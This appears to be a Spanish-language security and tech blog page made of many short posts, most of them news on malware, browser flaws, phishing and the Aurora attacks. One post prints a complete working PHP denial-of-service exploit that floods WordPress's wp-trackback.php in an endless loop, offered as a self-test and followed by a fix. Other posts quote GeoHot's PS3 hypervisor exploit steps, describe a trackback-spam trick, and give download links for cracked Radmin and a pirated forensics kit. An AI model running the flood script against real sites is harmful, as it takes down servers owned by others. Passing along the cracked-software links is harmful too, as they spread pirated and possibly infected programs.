25

Si -- No

Firefox, extensiones malignas…Muajajaja (risa malévola)

Es raro que hasta ahora nadie se haya tomado un minuto para pensar que esto no debería ser noticia. Es lógico pensar que esto iba a ocurrir en algún momento. El problema es la repercusión que tuvo este “FireFake”.

Sothink Web Video Downloader 4.0 y Master Filer, son las extensiones que contienen los archivos Win32.LdPinch.gen y Win32.Bifrose.32.Bifrose respectivamente y fueron informadas desde el blog oficial de Mozilla y eliminadas del directorio de extensiones oficial. Aunque por desgracia, las mismas ya contaban con alrededor de 4500 descargas.

Cómo eliminarlas?
Una vez desinstaladas las extensiones, vas a tener que efectuar un escaneo profundo de tu PC con tu antivirus dado que los troyanos (como otros) se alojan en diferentes directorios/programas de tu Windows.

25

Si -- No

Recompensa de 500 dólares por descubrir agujeros en Chrome

Chrome, el navegador abierto de Google, está ofreciendo una recompensa económica para que informáticos externos trabajen en la búsqueda de fallos en el navegador.

Chromiun, que está detrás del nacimiento de Chrome, reconoce que la iniciativa no es original, sino que la implantó Mozilla y con considerable éxito. La recompensa comienza en los U$S 500 para fallos sencillos y llega a los U$S 1.337 por los más graves. El dinero saldrá de las arcas de Google….se podrían haber jugado un poco mas no?

Cualquier tipo de agujero puede ser recompensado, y no sólo los de seguridad. Quedan exentos del concurso las personas que han trabajado en la escritura del código de Chrome y de Chromium Project.

Vía: ElPaís.com

51

Si -- No

Exploit para hackear la PS3

GeoHot, se acuerdan de ese pibito que hizo el primer jaibreak en Iphone para poder instalar aplicaciones crackeadas?
Eso permitió en su momento a los usuarios de Iphone y Ipod Touch instalar cualquier tipo de aplicación para sus plataformas sin necesidad de que estas pasen por el “filtro oficial”. A muchos les generó mas de una alegría y a otros (la gente de Cuppertino, por ejemplo…) una verdadera vergüenza.

Alguna vez en este blog se habló de un niño que atormetaba a Apple y hoy este niño, atormenta a Sony…

Hace unas pocas horas, GeoHot publicó en su blog el procedimiento para evadir la seguridad de la PlayStation 3, la cual estuvo dos años invicta y virgen…

Procedimiento: (http://pastie.org/795944)
geohot: well actually it’s pretty simple
geohot: i allocate a piece of memory
geohot: using map_htab and write_htab, you can figure out the real address of the memory
geohot: which is a big win, and something the hv shouldn’t allow
geohot: i fill the htab with tons of entries pointing to that piece of memory
geohot: and since i allocated it, i can map it read/write
geohot: then, i deallocate the memory
geohot: all those entries are set to invalid
geohot: well while it’s setting entries invalid, i glitch the memory control bus
geohot: the cache writeback misses the memory
geohot: and i have entries allowing r/w to a piece of memory the hypervisor thinks is deallocated
geohot: then i create a virtual segment with the htab overlapping that piece of memory i have
geohot: write an entry into the virtual segment htab allowing r/w to the main segment htab
geohot: switch to virtual segment
geohot: write to main segment htab a r/w mapping of itself
geohot: switch back
geohot: PWNED
geohot: and would work if memory were encrypted or had ECC
geohot: the way i actually glitch the memory bus is really funny
geohot: i have a button on my FPGA board
geohot: that pulses low for 40ns
geohot: i set up the htab with the tons of entries
geohot: and spam press the button
geohot: right after i send the deallocate call

Descarga: Exploit PS3
Fuente: GeoHot
Fuente: Wiki PS3 (Recomendado)

2

Si -- No

Evitar spam en Wordpress…

Existe una cantidad impresionante de plugins tipo Captcha para esta plataforma y son excelentes para evitar comentarios de spambots aunque, resultan un tanto molestos en la práctica general ya que muchos usuarios tienen problemas para identificar ciertos caracteres (en el caso de ReCaptcha).

En un post anterior, Cristian de SaberMenos.com.ar me aconsejó utilizar el sistema Akismet en conjunto con el plugin Cookies for Comments.

Akismet viene incluído en todas las versiones de Wordpress así que solo resta activarlo y obtener tu Wordpress API la cual se consigue registrándote en Wordpress.com (dentro del panel de administración tenés el enlace de registro).

Cookies for Comments puede descargarse desde la web de plugins de Wordpress.

Bien, con esto tenemos asegurada una barrera contra el spam de al menos el 99,9% pero…

Y los trackbacks?
Un trackback es un enlace inverso a nuestro blog. Es una notificación de que alguien ha enlazado nuestro post en otro blog.
Según Wikipedia: Usar un trackback es tan fácil como añadir el enlace trackback del blog original en tu blog. Poco tiempo después aparecerá un enlace a tu blog en la sección ‘Trackbacks’ o simplemente como un comentario automático.
La diferencia con el PingBack es que el track se comporta mas como un comentario.

Ahora bien, según leíamos en la definición wikipediana, solo tenemos que añadir el enlace trackback del blog original en nuestro blog.
Wordpress posee un envío automático de trackbacks a diferentes URL’s lo que equivale a un envío masivo de spam. Esto puede ser usado como arma de doble filo para promocionar un blog o para ser víctima de los TrackSpams (acabo de inventar el término )

Qué quiero decir con todo esto?
Que los spamers han encontrado la manera de saltear cualquier tipo de captcha y medidas de seguridad con el simple envío de un trackback a los blogs víctima. Esto equivale a que tu blog puede llenarse de spam con solo un par de clicks de otro spamer o blogger.

En este momento, acabo de enviar un trackback a un blog. No voy a poner la URL de enlace en este post para que comprueben que no es un pingback sino un trackback generado adrede a fines de ubicar ESTE post en el post de mi amigo Martín Navarro de UnPocoGeek.com el cual no tiene nada que ver y ni siquiera está enlazado.

El sitio a donde enlacé este mismo post es:
unpocogeek.com/2010/01/02/opinion-sobre-avatar-3d-en-opiniones-un-poco-geeks/ (noten que saqué la www para que no lo enlace automáticamente sino que el trackback se genere en forma manual desde mi panel).

Al entrar a la web de Martín veo el trackback enlazando a mi blog. De esta manera, acabo de spamear a mi amigo sin necesidad de pasar por los filtros de Spam.

Contramedidas
Esto, desgraciadamente, requiere desactivar la opción “Permitir trackbacks y pingbacks en esta página.” en las opciones de comentarios dentro de la hoja de “añadir post/página” de Wordpress y digo “Desgraciadamente” porque los blogs con muchas visitas no podrán ver si otros sitios enlazaron a sus contenidos.

3

Si -- No

Alemania recomienda NO USAR Internet Explorer

La Oficina Federal alemana para la seguridad en las tecnologías de la información (conocida como BSI) recomienda a los usuarios de Internet Explorer la utilización de un navegador alternativo temporalmente hasta que Microsoft publique un parche para la última vulnerabilidad crítica conocida y utilizada en los ataques en China contra los servidores de más de treinta empresas. Un ataque que ha llevado a Google a amenazar con cerrar Google.cn y suspender sus actividades en el gigante asiático.

Hace unos días Google amenazó al gobierno chino con cerrar sus operaciones en el país después de sufrir un ciberataque desde el país asiático dirigido a espiar las cuentas de correo electrónico de activistas pro derechos humanos.

Según todos los indicios, este ataque fue ordenado por el gobierno dictatorial chino y coordinado contra una treintena de empresas, en una operación bautizada por los medios como “Aurora“. Un informe de la firma de seguridad McAfee Labs aseguró que los ataques utilizaron una vulnerabilidad de los navegadores Internet Explorer.

Vulnerabilidad crítica confirmada por Microsoft y que es la base para la decisión de la oficina federal de seguridad alemana BSI que recomienda a los usuarios y empresas no utilizar Internet Explorer hasta que Microsoft no publique el correspondiente parche corrector que cierre la brecha de seguridad.

El fallo afecta a las ediciones de IE en el mercado (6, 7 y y en todos los sistemas Windows. Aunque Microsoft ha recomendado distintas soluciones para minimizar el riesgo como utilizar el “modo protegido” y deshabilitar las secuencias de comandos ActiveX, la oficina alemana dice que no puede evitar totalmente los ataques por lo que recomienda usar un navegador alternativo.

5

Si -- No

Documental Hackers – DeFCON

Gracias a Federico Ini quien me permitió la publicación de este video, podemos apreciar una de las mas grandes e importantes reuniones de hackers del mundo. Un lugar peligroso para ir sin un firewall

3

Si -- No

Radmin Portable V2.1 Full (descarga directa)

Radmin es un programa muy simple de conseguir sin embargo, sus períodos de prueba son imposibles de extender. Estuve toda la tarde buscando este software y me encontré con esta versión, muy interesante y quiero compartirla con ustedes…

Radmin Portable V2.1
Ya todos sabemos para que sirve el Radmin así que no voy a explayarme demasiado. Obviamente no es tan avanzado como sus hermanos menores (o sea, las últimas versiones…) pero posee una gran cantidad de funcionalidades como Telnet, Transferencia de archivos, acceso completo stealth, acceso “solo lectura” (ver la pantalla del otro), etc…Pero carece de un aditamento importante, no permite poner clave a las sesiones.

En fin, es una excelente alternativa para controlar remotamente nuestras computadoras.

Descarga Directa: Radmin V2.1 Full – ElPlog.com

3

Si -- No

2009 bate récords en malware

PandaLabs, el laboratorio antimalware de Panda Security, publicó en su Informe Anual sobre Malware los principales acontecimientos en cuanto a seguridad informática se refiere que han tenido lugar durante el año 2009. La principal noticia está en el prolífico año que los hackers han tenido en cuanto a la creación de nuevo malware: 25 millones de ejemplares en sólo un año, cuando en los 20 años de historia de la compañía se habían almacenado 15 millones.

El 2009 ha sido el año de las soluciones de seguridad en la nube, pero también en el que se han batido récords de creación de malware.
Además, destaca la aparición de numerosos ejemplares nuevos de troyanos bancarios (un 66%) y de los llamados “falsos antivirus” o rogueware. Igualmente, los tradicionales virus, que se creían ya extintos, han reaparecido causando importantes daños con ejemplares como Conficker, Sality o el antiguo Virutas.

El spam ha mantenido sus altos niveles de actividad durante este año: el 92% del tráfico total de correos electrónicos han sido spam. Respecto a los ganchos utilizados para engañar a los usuarios para su apertura, encontramos temas relacionados con la actualidad informativa: escándalos o muertes (reales o ficticias) de famosos, la gripe A, supuestos vídeos de políticos, etc. Respecto a sectores, los que más spam han recibido ha sido el automovilístico y el eléctrico, seguido por el gubernamental.

En cuanto a vías de distribución, las redes sociales (principalmente, Facebook, Twitter, YouTube o Digg), así como los ataques SEO realizados con webs falsas que descargaban malware han sido las vías de distribución favoritas de los ciberdelincuentes, que han consolidado sus modelos de negocio underground aumentando considerablemente sus beneficios.

Respecto a los países que han registrado un mayor número de infecciones a lo largo de todo el año, según los ordenadores analizados y desinfectados gratuitamente por Panda ActiveScan, el ranking lo encabeza Taiwan, seguido por Rusia, Polonia, Turquía, Colombia, Argentina y España. Los menos infectados, Portugal y Suecia.

Por otro lado, 2009 ha sido un año plagado de noticias relacionadas con supuestos ataques cibernéticos con intereses u objetivos políticos, lo que viene a confirmar lo que hasta ahora se suponía era una posibilidad remota o más bien una visión romántica propia de películas de cine americano.

Por último, decir que PandaLabs predice que el número de malware seguirá creciendo durante 2010: Windows 7 tendrá, sin duda, un protagonismo para los hackers a la hora de crear nuevo malware; crecerán los ataques para Mac; no será el año para los virus de móviles, y asistiremos a nuevos ataques políticos a través de Internet.
Estas y otras conclusiones están disponibles en el Informe Anual sobre Malware de PandaLabs que se puede descargar completo desde su web.

2

Si -- No

Acceso root en Nexus One

Antes incluso que Google ponga a la venta su smartphone, ni tan siquiera oficializando el lanzamiento del Nexus One, algún privilegiado usuario que ha tenido ocasión de probarlo (y destriparlo) ha publicado en la red los archivos necesarios y un pequeño manual con indicaciones precisas para acceder al sistema como root, en la práctica permitiendo como “superusuario” el control total del dispositivo. El núcleo Linux del Nexus y el enfoque abierto de Android permite estas actuaciones.

Desde los foros del blog especializado Modaco, explican los detalles para lograr el acceso root del Nexus One en unos sencillos pasos:

Descargar este archivo y descomprimirlo para a continuación poner el terminal en modo ‘recovery’ apagando el dispositivo, quitando la batería, conectando al puerto USB, para cuando aparezca el icono de la batería en la pantalla, poner la misma y pulsar al mismo tiempo el botón de encendido y el de la cámara.

Tras ello, en sistemas Windows basta con ejecutar el archivo de procesamiento por lotes ‘install-superboot-windows.bat’. En Linux abrimos una ventana del terminal y dentro del directorio que contiene los archivos descargados y descomprimidos tecleamos ‘chmod +x install-superboot-linux.sh’ seguido de la ‘./install-superboot-linux.sh’. Igual en sistemas Mac con instrucciones ‘chmod +x install-superboot-mac.sh’ e ‘./install-superboot-mac.sh’.

Dicen que funciona… Si alguien tiene acceso al equipo y se atreve… ya nos contará. Aunque hay que tener cuidado con estos hacks y responsabilizarse del posible daño al equipo.
Está buenísima la posibilidad que el usuario tenga acceso total a sus dispositivos, algo que por lo que vemos será simple en el Nexus One.

0

Si -- No

FBI Forensic Field Kit AIO (Todo en uno)

Éste es el último disco bootable del FBI. Es un TODO EN UNO con herramientas de análisis forense informático. Muy útil a la hora de efectuar peritajes.

Forensics Tools:
Sleuth Kit -Forensics Kit
Py-Flag – Forensics Browser
Autopsy – Forensics Browser for Sleuth Kit
dcfldd – DD Imaging Tool command line tool and also works with AIR
foremost – Data Carver command line tool
Air – Forensics Imaging GUI
md5deep – MD5 Hashing Program
netcat – Command Line
cryptcat – Command Line
NTFS-Tools
qtparted – GUI Partitioning Tool
regviewer – Windows Registry Viewer
X-Ways WinTrace
X-Ways WinHex
X-Ways Forensics
R-Studio Emergency (Bootable Recovery media Maker)
R-Studio Network Edtion
R-Studio RS Agent
Net resident
Faces 3 Full (600 megs)
Encase 4.20

Field Kit Manuals
Incident response – Computer Forensics
Computer Crime investigation
Forensic Pathology
Internet Forensics
Forensic interpretation of Evidence
Windows Forensics
Computer Forensics -An Illustrated Dictionary
Computer Forensics – jumpstart

Additional programs on Boot DVD:
Gentoo Linux 2.6 Kernel – Opyimized for Forensics Use
XFCE – GUI
Apache2 – Server
Mysql PHP4
Open Office
Gimp – Graphics Program
KSnapshot – Screen Capture Program
Mozilla
Gnome CD Master
K3b – CD Burner
XMMS – media player
Porthole – Gentoo Graphics Package Manager
Karchiver – GZIp GUI

Security Tools:
Etherape – GUI Network Traffic Monitor
Clamv – Anti Virus
snort – Command Line
John the Ripper – Command Line password *****er
rkhunter – Command Line
Ethereal – Network Traffic Analyzer
FWBuilder – GUI Firewall App
nessus – network scanner

Descarga Radpidshare

http://rapidshare.com/files/56210993/F.B.I._Field_Kit.part01.rar

http://rapidshare.com/files/56216721/F.B.I._Field_Kit.part02.rar

http://rapidshare.com/files/56221834/F.B.I._Field_Kit.part03.rar

http://rapidshare.com/files/56227058/F.B.I._Field_Kit.part04.rar

http://rapidshare.com/files/56231002/F.B.I._Field_Kit.part05.rar

http://rapidshare.com/files/56234996/F.B.I._Field_Kit.part06.rar

http://rapidshare.com/files/56239049/F.B.I._Field_Kit.part07.rar

http://rapidshare.com/files/56243909/F.B.I._Field_Kit.part08.rar

http://rapidshare.com/files/56249069/F.B.I._Field_Kit.part09.rar

http://rapidshare.com/files/56255086/F.B.I._Field_Kit.part10.rar

http://rapidshare.com/files/56261284/F.B.I._Field_Kit.part11.rar

http://rapidshare.com/files/56267357/F.B.I._Field_Kit.part12.rar

1

Si -- No

Vulnerabilidad en Windows 7

Microsoft publicó el primer anuncio de vulnerabilidad de las denominadas “zero day” que afecta exclusivamente a Windows 7 y a Windows server 2008. Se trata de un problema del Server Message Block que permite ataques de denegación de servicio. Según el boletín de seguridad que ha publicado Microsoft, esta vulnerabilidad no permite tomar el control del ordenador ni instalar código malicioso, sino simplemente bloquearlo. No se anunció fecha para la publicación de un parche.

Windows 7 ya puede “presumir” de tener el primer “zero day exploit”, la primera vulnerabilidad detectada y que aún no dispone de parche para solucionarla y que es exclusiva de Windows 7. Microsoft ha publicado en su boletín que ha detectado este agujero de seguridad en el sistema que aprovecha un problema con el SMB (Server Message Block) y que es capaz de bloquear el ordenador utilizando una URL especialmente diseñada para aprovechar esta vulnerabilidad.

En el boletín de seguridad publicado por Microsoft se aclara que la empresa es consciente que el código de la vulnerabilidad está publicado pero que no tiene noticia de que se estén produciendo ataques aprovechando este problema. Según el análisis de seguridad, la vulnerabilidad solamente permite bloquear la computadora, no tomar el control del mismo o introducir código malicioso.

Aunque se afirma que se trabaja en publicar un parche que solucione el problema, no se ha anunciado ninguna fecha para su salida. Solamente se aclara que “Microsoft tomará la acción apropiada para ayudar a proteger a sus consumidores”. Mientras tanto en el propio boletín se recomienda bloquear con el firewall los puertos TCP 139 y 445.

Según expertos en seguridad, se trata de puertos que normalmente es bueno tener bloqueados, sobre todo en entornos empresariales, pues son utilizados por numerosos ataques.

1

Si -- No

Hackean la activación de Windows 7

Según parece, un grupo de hackers ha dado con un método mediante el cual, un equipo con Windows 7 puede seguir siendo utilizado tras los 30 días de prueba (120 si se utiliza el comando rearm). Microsoft ha confirmado estar al tanto de ello y trabajando para solucionarlo. El potencial de los grupos de usuarios, modders y hackers es prácticamente ilimitado, si se aplicara todo ese conocimiento e inteligencia hacia objetivos comunes, es probable que se dieran pasos de gigante en otros campos.

Tras la compra de Windows 7 los usuarios tienen 30 días para activar su copia con el número de licencia adquirido. Sin embargo un reciente método ha conseguido que las notificaciones y las consecuencias de no activarlo cesen.

El método no es perfecto ya que no es capaz de hacer que el sistema aparezca como original / legítimo, pero sí que hace posible el uso del sistema sin ningún tipo de restricción pasado el periodo de prueba indefinidamente. Microsoft ha confirmado que están al corriente de la técnica utilizada y en una nota de prensa han comentado que están trabajando para solucionarlo.

Además de ello Microsoft ha querido alertar a los usuarios con que este tipo de programas puede contener malware y programas dañinos para el PC. Este caso no es más que otro ejemplo a tener en cuenta de entre la gran cantidad de tiranteces que han levantado las licencias de software entre usuarios y desarrolladores.

0

Si -- No

Videovigilancia con D-Link

D-Link ha anunciado la disponibilidad de una aplicación de software para Microsoft Windows Home Server derivada de su sistema de gestión de cámaras IP D-ViewCam. Este software “add-in”, gratuito y disponible a través de la Web de D-Link, es una aplicación que, sincronizada con un servidor doméstico basado en el software de Microsoft, permite a los usuarios acceder y gestionar rápidamente sus cámaras de red domésticas desde cualquier PC, con sólo un navegador Web.

Windows Home Server permite a pymes y usuarios domésticos compartir múltiples PCs, así como proteger y organizar grandes cantidades de información multimedia (imágenes, música y documentos), con diversas prestaciones como backup automático, recuperación del sistema, protección avanzada de datos, acceso remoto a aplicaciones y datos, almacenamiento centralizado y compartición de ficheros, entre otros.

Con el nuevo “add-in” de D-Link (compatible con cámaras de red DCS-1130 y DCS-2121) instalado sobre Windows Home Server, el usuario puede ahora grabar y controlar vídeo proveniente de las cámaras de red, directamente al servidor, con la posibilidad de programar grabaciones por adelantado y acceder al material grabado o a imágenes en directo desde el servidor, todo ello a través de su navegador Web, con la posibilidad de visionar hasta cuatro cámaras simultáneamente desde una sola pantalla.

0

Si -- No

Ikee: primer virus para iPhone

El aumento de popularidad de los smartphones en las telecomunicaciones e informática móvil mundial traerá consecuencias negativas como el auge de malware en la plataforma. En especial para el iPhone, uno de los más extendidos, que ya cuenta oficialmente con su primer virus, aunque sólo afecta a equipos desbloqueados y en principio es inofensivo y puede ser fácilmente eliminado. Sin embargo, la publicidad del virus y la publicación del código fuente permitirá otros gusanos no tan bondadosos.

Un diseñador web australiano dice haber creado el primer virus para el teléfono inteligente de Apple y el reproductor iPod touch. El gusano no es destructivo y únicamente cambia el fondo de pantalla del usuario por una imagen del cantante inglés de música pop Rick Astley.

Ashley Towns, pseudónimo del autor del gusano, explicó que “el virus en sí no es malicioso y no está ahí para hacer daño, simplemente está para divertirse y para despertar a la gente un poco concienciando de la necesidad de proteger el celular con una contraseña segura”.

Towns infectó inicialmente unos 100 teléfonos aunque al propagarse a través de los contactos ya no es posible controlar la infección, en principio en Australia, aunque ya estará circulando por medio mundo.

El virus puede ser eliminado fácilmente cambiando la contraseña del terminal y borrando algunos archivos, pero la publicación del código fuente completo del programa malicioso y de sus variantes permitirá la llegada de otro tipo de malware que no se limitará a ilustrar a los usuarios con la imagen del cantante favorito del autor.

0

Si -- No

Nigeria quiere renovar su imagen en internet y pone mano dura al SCAM

A muchos seguramente les habrá llegado el famoso scam por mail donde una persona de un banco quiere compartir o incluirnos en un negocio donde podremos salir beneficiados con mucha platita, no sin antes dejarle nuestros datos (cuenta bancaria, algún password, etc.)

Esta semana el gobierno de Nigeria, decidió echarle manos al asunto e iniciaron un operativo denominado “Eagle Claws” (garras de águila) para cerrar la mayor cantidad de sitios fraudulentos y arrestar a la gente que se encarga de enviar los emails con scams a todo el mundo.

Este tipo de estafas al menos las provenientes de este país, vienen recaudando varios miles de dólares al año gracias a los incautos que por desconocimiento acceden a enviar cualquier información que les pide el estafador.

De paso, desde elplog alentamos a la gente que también por desconocimiento llegó a este post XD, a que no dejen sus datos personales y bancarios en cualquier sitio, siempre vean que tengan el certificado de seguridad correspondiente y que sea un sitio seguro (por lo general las urls de transacciones seguras empiezan con HTTPS)

Muy bien por parte del gobierno nigeriano.

BTW, este es mi primer post como invitado en el blog del perro, espero les haya sido útil o al menos los haya entretenido un poco. ahah soy Martin de unpocogeek.
Gracias perro por dejarme escribir acá

Fuente:
Arstechnica

0

Si -- No

Fallo de seguridad en Wordpress

Hace apenas un par de días atrás José Carlos Norte notificaba acerca de un fallo en todas las versiones de Wordpress que permitía a un atacante ejecutar una rutina de denegación de servicios en los servidores que estén brindando alojamiento a un sitio desarrollado con Wordpress.

Dicho fallo radica en el archivo wp-trackback.php al no validar como corresponde la variable $charset y de esta manera permite el paso de peticiones del tipo POST especialmente diseñada con una cantidad indeterminada de parámetros, causando de esta manera el consumo masivo de recursos en el servidor afectado.

El exploit
El siguiente código nos permitirá saber si nuestro sitio web es o no vulnerable a tal cobarde ataque y de esa manera podremos proceder a realizar el patcheo correspondiente al bug.

//wordpress Resource exhaustion Exploit
//http://rooibo.wordpress.com/
//security@wordpress.org contacted and get a response,
//but no solution available.
if(count($argv) < 2) {
echo “You need to specify a url to attack\n”;
exit;
}

$url = $argv[1];

$data = parse_url($url);
if(count($data) < 2) { echo “The url should have http:// in front of it, and should be complete.\n”; exit; } if(count($data) == 2) { $path = ”; } else { $path = $data['path']; } $path = trim($path,’/’); $path .= ‘/wp-trackback.php’; if($path{0} != ‘/’) { $path = ‘/’.$path; } $b = “”; $b = str_pad($b,140000,’ABCEDFG’); $b = utf8_encode($b); $charset = “”; $charset = str_pad($charset,140000,”UTF-8,”); $str = ‘charset=’.urlencode($charset); $str .= ‘&url=www.example.com’; $str .= ‘&title=’.$b; $str .= ‘&blog_name=lol’; $str .= ‘&excerpt=lol’; $count = 0; while(1) { $fp = @fsockopen($data['host'],80); if(!$fp) { if($count > 0) {
echo “down!!!!\n”;
exit;
}
echo “unable to connect to: “.$data['host'].”\n”;
exit;
}

fputs($fp, “POST $path HTTP/1.1\r\n”);
fputs($fp, “Host: “.$data['host'].”\r\n”);
fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);
fputs($fp, “Content-length: “.strlen($str).”\r\n”);
fputs($fp, “Connection: close\r\n\r\n”);
fputs($fp, $str.”\r\n\r\n”);

echo “hit!\n”;
$count++;
}

?>

La solución
Hay tres maneras de evitar ser víctimas de este fallo. Una sería modificando el parámetro php_memory_limit del php.ini en la configuración de nuestro servidor y con esto evitaríamos que las aplicaciones que allí se ejecuten consuman solo los recursos que nosostros le dispongamos, la segunda es consultar si nuestro hosting posee mod_security, ya que filtraría los paquetes “malintencionados” o masivos y la tercera es simplemente, modificar el archivo wp-trackback.php
Nuevamente, José Carlos Norte nos brinda la solución:
La linea 45 del archivo wp-trackback.php: $charset = $_POST['charset'];
Debe ser reemplaza por el siguiente código:
$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }

También podemos encontrar soluciones a diversos inconvenientes de seguridad en un “whitepaper” provisto por la gente de DragonJar.org en donde nos sugieren el uso de otro tipo de técnicas para mantener seguro nuestro blog como el WP-IDS, un mod para Wordpress modificado en el mismo paper.

El whitepaper de DragonJar abarca los siguientes temas
1. Introducción
2. Instalando Wordpress
2.1. Accediendo a las tablas de Wordpress
2.2. Cambiando el prefijo de las tablas
2.3. Antes de la instalación
2.4. Cambio manualmente
2.5. Através del cambiador de prefijos de Wordpress
3. Preparando el Blog
3.1. Cambiando el nombre de usuario “admin”
3.2. Creando un nuevo usuario con acceso limitado
4. Endureciendo la instalación de WP
4.1. Restringiendo wp-content y wp-includes
4.2. Restringiendo wp-admin
4.2.1. Bloquear todo excepto tu IP
4.3. Contraseña requerida – .htpasswd
4.3.1 El archivo .htaccess
4.3.2 El archivo .htpasswd
5. Plugins necesarios
5.1 WPIDS – Detector de intrusos
5.2 Wordpress Plugin Tracker – ¿Estas actualizado?
5.3 Wordpress Online Security Scanner

Nota: El documento se encuentra en inglés.

Descarga

Vía | DragonJar.org | José Carlos Norte

0

Si -- No

Usuarios de Gmail, Yahoo y Hotmail hackeados

Hace unos días se filtró una lista de más de 10.000 usuarios de los servicios de correo de Microsoft (Hotmail, Live y MSN). Hoy se sabe que hay usuarios de Gmail y Yahoo! también afectados de la misma manera. Al ser usuarios de plataformas on-line distintas todo apunta a un caso masivo de phishing, aunque, claro está, aún tienen que investigar los hechos. Según BBC News, hay un total de cerca de 20.000 cuentas afectadas en total y, de momento, no se conoce el origen.

BBC News vió una lista de más de 20.000 credenciales, nombres de usuario y contraseñas de correos electrónicos on-line de Hotmail, Yahoo, AOL, Gmail y otras empresas. Según parece, la lista ha aparecido en la misma web, pastebin.com, y deja prácticamente claro que la naturaleza del ataque fué la de phishing. Es un gran número de cuentas, y además teniendo en cuenta que un 40% de los usuarios hace uso de la misma contraseña para todos los servicios on-line. Estamos hablando de un problema de seguridad grave.

La recomendación que es muy simple, cambiar las contraseñas y preguntas de seguridad por otras nuevas y, eso sí, no hacer caso de los típicos emails phishing con la forma Somos “tal” empresa, ha habido un error en nuestro sistema, tiene que volver a introducir sus datos, o cambiar la contraseña.

0

Si -- No

Activistas pro DDHH y medios extranjeros reciben ciberataques desde China

Medios de comunicación extranjeros y activistas pro Derechos Humanos chinos están recibiendo ataques cibernéticos de cara a la celebración del desfile militar del Día Nacional el próximo 1 de octubre, con el que el Partido Comunista celebrará sus 60 años en el poder.

Este tipo de ataques vienen siendo comunes en el país, pero cada vez van más enfocados a periodistas y activistas pro Derechos Humanos. “Definitivamente hay un patrón de ataques de virus en los días previos a fechas importantes en el calendario político chino”, ha afirmado Nicholas Bequelin, miembro de Human Rights Watch en Hong Kong.

Bequelin ha matizado que “no está claro si el Gobierno está detrás de ello, cierra sus ojos ante esto, lo apoya o no tiene nada que ver”, puesto que “también hay piratas informáticos nacionalistas”. “No hay forma de saber a ciencia cierta quién está detrás” de estos ataques, estimó.

Entre las nuevas técnicas seguidas por los ‘hackers’ están la de hacerse pasar por un remitente conocido o reenviar correos electrónicos infectados de organizaciones activistas. Asimismo, multitud de periodistas chinos que trabajan para medios extranjeros en Pekín y Shangai han recibido virus alojados en misivas presuntamente enviadas por una responsable de información económica llamada Pam Bouron.

Antes de los Juegos Olímpicos de 2008 los medios y las ONG sufrieron ataques similares, mientras que en marzo del presente año investigadores de la organización canadiense Infowar Monitor, experta en espionaje cibernético, identificaron un alto grado de infiltración a través de Internet en el Gobierno tibetano en el exilio.